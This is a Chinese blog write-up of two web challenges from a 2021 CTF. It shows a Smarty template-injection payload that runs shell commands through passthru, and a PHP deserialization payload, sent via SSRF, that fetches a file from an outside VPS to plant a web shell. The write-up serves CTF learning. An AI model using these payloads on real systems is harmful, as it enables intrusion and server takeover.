【CTF系列】2021年2月四叶草CTF

最新推荐文章于 2024-05-11 05:44:13 发布
最新推荐文章于 2024-05-11 05:44:13 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/114161377
版权

文章目录

四叶草网络安全学院的一次推广活动吧,正好可以试试自己的水平(问就是菜。

1 Web

1.1 题目:GET

题目描述:Hello GET_flAG!!!

题目地址:http://0bc68a13.yunyansec.com/

  1. 根据提示输入任意的Get参数,即可查看源码。http://0bc68a13.yunyansec.com/?1

<?php
include('flag.php');
include('./libs/Smarty.class.php');
$smarty = new Smarty();
if($_GET){
    highlight_file('index.php');
    foreach ($_GET AS $key => $value)
    {
        print $key."\n";
        if(preg_match("/flag/i", $value)){
            
            $smarty->display('./template.html');


        }elseif(preg_match("/system|exec|eval|cat|assert|file|fgets/i", $value)){


            $smarty->display('./template.html');            
            
        }else{


            $smarty->display("eval:".$value);//flag.php
        }
        
    }
}else{
    $smarty->display('./template.html');
}
?> 1
  1. 查询到smarty是模版注入的漏洞,访问验证漏洞

http://d40c2bf8.yunyansec.com/?a={phpinfo()}

  1. 利用寻找可利用的命令执行函数来查看 flag

http://938e2c8c.yunyansec.com/?a={passthru(%22tac%20find%20-iname%20fla*%22)}


(图片说明:passthru 函数会执行后面的命令tac `find -iname fla*`,这个命令用来寻找 flag 文件并且输出其内容)

1.2 题目:Website

题目描述:Website

附件下载:暂无附件

题目地址:http://eb9a2ac6.yunyansec.com/

  1. 猜测为 SSRF,有 WAF,可以使用 302 跳转绕过(可以使用 PHP 实现 302 跳转,使用 nginx 设置太麻烦了)

  1. 使用 File 协议读取配置文件 /etc/httpd/conf/httpd.conf,发现 web 路径(Web1 和 Web2),可以进一步读取网站源码。
<VirtualHost _default_:80>
DocumentRoot /var/www/html/web1
</VirtualHost>


<VirtualHost *:8080>
    DocumentRoot /var/www/html/web2
</VirtualHost>
</div></body>
</html>
  1. php反序列化拿shell,http://180fe897.yunyansec.com/?url=http://127.0.0.1:8080?data=payload 在 1.txt 中写入 Web Shell。
<?php

class copy_file{
    public $path = 'upload/';
    public $file="e.php";
    public $url='http://127.0.0.1:80/?url=http://vps/1.txt';

}
echo urlencode(urlencode(serialize(new copy_file())));

?>
  1. 访问 Web Shell,并找 flag。

2 小结

元宵节前一天的比赛,TimeLineSec 队里的师傅们把题目 AK 了🥳,Cool。

我第一道题是自己完整做出来的,第二道题和队里的师傅稍微讨论了一下,就接近 2 道题的样子。

打 CTF 有半年左右了,但这半年都只是在关注漏洞本身,属于一种只见树木不见森林的状态,希望后面能慢慢的再提升一些核心的技能点。

chiehw
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
四叶草云演-CTF03# ereg
weixin_43973521的博客
02-21 595
四叶草云演-CTF01# 单身一百也没用 # 题目 题解: 首先,启动环境 查看网页源代码没任何发现,打开burpsuite抓包 右键Repeater发送 发送页面数据得到KEY值 在线base64解密:https://base64.us/ 得到ssctf{4e5f5399301b83ef9f071cda78bdd636} ...
四叶草交流友谊赛
Ccai的博客
05-08 454
迷路的菜鸟,CTF从入门到放弃。 几天没做题,提不动刀了。 easyYM 运行程序。 直接输出了flag? 其实并没有,题目描述也说了这不是真正的flag,真正的flag格式是flag{}。 拖进IDA, 好像没什么有用信息。(作者太菜,在这里还绕了好久) 看看题目描述,关键函数并不一定执行到了。 看看汇编代码。 好吧,调用主函数之前还执行了下面这段代码,这里应该就是关键代码。在下面其...
[WRITEUP]第一届四叶草网络安全学院牛CTF大赛WRITEUP
Y4tacker的博客
02-26 3432
第一届四叶草网络安全学院牛CTF大赛WRITEUP 队伍信息战队名称 战队成员姓名:Firebasky、Y4tacker、lastsward、atao、m1n9yu3 解题情况战队排名答题情况Web WebGET 首先传?flag=1,发现似乎是smarty, 测试{$smarty.version}, 成功过滤cat,用tac发现是smarty注入简单了 那就flag={if passthru(“tac fl*”)}{/if} 即可获得flag WEBsite 首先打开页面看到接收url参数,是ssrf考
2024最全四叶草云演-CTF04# 后台管理系统,2024最新巩固知识体系
最新发布
2401_84544531的博客
05-11 634
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
四叶草云演-CTF04# 后台管理系统
weixin_43973521的博客
02-22 1257
网址:https://www.yunyansec.com/#/experiment/ctf/ 题目:后台管理系统 知识点:基于约束的sql攻击 在INSERT中,SQL会根据varchar(n)来限制字符串的最大长度。如果字符串的长度大于“n”个字符的话,那么仅使用字符串的前“n”个字符。 在SQL中执行字符串处理时,字符串末尾的空格符将会被删除(结合上面的这里应该就可以构造出payload了)。 题解: 启动环境,打开首页,点击注册 注...
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
ISSessions-2021-CTF:ISSessions 20213CTF的文章
04-11
【标题】:“ISSessions-2021-CTF:ISSessions 20213CTF的文章” 在信息安全领域,Capture The Flag(CTF)是一种流行的比赛形式,它涉及网络安全、逆向工程、密码学等多个领域的知识挑战。这篇文章集合了2021...
Securinets CTF Quals 2021 Writeups.pdf
03-22
Securinets CTF Quals 2021 Writeups.pdf
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 539
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF 冬奥会_is_coming 2021 蓝帽杯 WriteUp
baynk的博客
04-30 1718
不想好好工作,就想学习,工作期间偷懒,和群友玩CTF,怎一个惨字了得。。。 一个Misc题,其实做的特别特别少,都是现学现卖,最后还是看群友的WP复现完成的。简单记录下复现过程。 下载地址放这,自行下载 ub97 自己肝的 只有一张图片,啥都没,看属性,改长宽啥的什么都没有。 丢Kali Binwalk看下,有文件,接着做了分离。 得到了一个rar和一个zlip文件 这里通过听歌及查信息等方式都没发现啥,然后通过audacity看了下音乐频谱啥的也没东西,最后通过MP3Stego发现了是有加密的,但
四叶草网络安全学院第一届ctf比赛题目WP
抚琴
02-26 2366
大家好关于这次比赛密码学和部分移动安全是我出的 我就是抚琴没错在这里我们来解题吧(不要吐槽我,嘴下饶人) 1 某加密算法实现如下 import java.nio.charset.Charset; public class DeEnCode { private static final String key0 = "2021.2.26"; private static final Charset charset = Charset.forName("UTF-8"); private s
2021*CTF部分wp
re1wn
01-30 1136
一个废话连篇思路不清的wp,后续会完善
bilibili2021CTF-安全挑战赛-reverse-复现
ookami6497的博客
10-27 1173
哔哩哔哩安全挑战赛逆向复现第一题第二题 第一题 第一题逆向很简单,用JEB打开,点开com包,找到主函数按tab查看伪代码,加密代码很简单,一个简单的异或就行。 将v2和v1 转成字符得到两串base64加密后的密文 v2 = NjI1OzA3YGAuNjNmNzc7YmU= v1 = YWBlOmZnNjAuOmJmNzAxO2Y= base64解码后得到 v2 = 625;07``.63f77;be v1 = a`e:fg60.:bf701;f 然后搞个脚本就行,脚本如下:
文件上传+CTF题目
unexpectedthing的博客
10-27 2379
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
四叶草移动网络安全学习日志
qq_44365878的博客
07-25 446
四叶草学习日志 DAY_1 Android Studio之前已经安装 adb使用时出现 connect error for write: no devices/emulators founds 解决:手机打开usb调试 CrackeMe_clover01解题思路: 再进行反编译后发现他会在最开始进行一个用户字段的判断,如下 如果为空返回false,我让他在这直接返回true 根据这个思路,我找到了下面的返回值在源码中的表示 将v7的值由0x0改为0x1然后编译安装后,得到flag D
一道简单的逆向题目(取于2019成信大四叶草安全杯)
qq_42874910的博客
08-07 485
代码分析的逆向题目基础工具idaollydbgpeid开始分析查壳ida静态分析杂谈 基础工具 工欲善其事必先利其器,做逆向题目时好的工具必不可少,peid,od和ida为本题练习需要的工具 //其实od在本题也非必须工具 ida 静态分析神器 ollydbg 逆向必备神器 peid 查壳工具 开始分析 首先运行一下 随便输入一段字符后,程序就退出了 查壳 拖入peid发现无壳 ida静态分析...
swpuctf 2021 新生赛]hardrce
07-28
- *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值